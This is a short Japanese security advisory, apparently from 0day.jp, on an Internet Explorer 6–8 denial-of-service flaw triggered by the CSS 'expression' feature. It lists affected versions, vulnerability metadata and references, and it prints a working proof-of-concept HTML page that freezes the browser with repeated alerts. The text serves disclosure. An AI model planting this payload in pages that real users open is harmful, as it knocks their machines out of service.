【ゼロデイ】Internet Explorer CSS DoSセキュリティ問題について

本件セキュリティ問題について下記のブラウザーとOS情報に影響があります。

Microsoft Internet Explorer 8
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
OS：マルチプルWindowsOS

問題の説明↓

IEのCSSバグがあり、リモートのページに再現情報を使われたらIEユーザのDoS攻撃仕組みを作る事が出来ます。DoS攻撃の影響でPCはユーザからのコマンドが反映されない状況となります。

追加情報↓

Microsoft Internet Explorer CSS 'expression' Remote Denial of Service Vulnerability
Class: Design Error
Remote: Yes
Local: No
Published: Jun 01 2010 12:00AM
Updated: Jul 12 2010 07:57PM
Credit: MustLive

再現仕方↓

下記のコードで再現が出来ます
<html>
<head>
<title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<p style="dos:expression(alert('DoS'))">IE DoS</p>
</body>
</html>

解決方法↓

Microsoft社からのセキュリティパッチが未だ出ないと解決になりません。ワークラウンドについて現在難しいです。さらに再現コードがインターネットで良く交換されている状況ですので、本件はゼロデイ状況になりました。

リファランす↓

http://unixfreaxjp.blogspot.com/2010/07/zerodaysaveasdos.html
http://unixfreaxjp.blogspot.com/2010/05/zerodaymailtodos.html
http://www.securityfocus.com/bid/40487

---
http://0day.jp
セキュリティリサーチチーム
アドリアン・ヘンドリック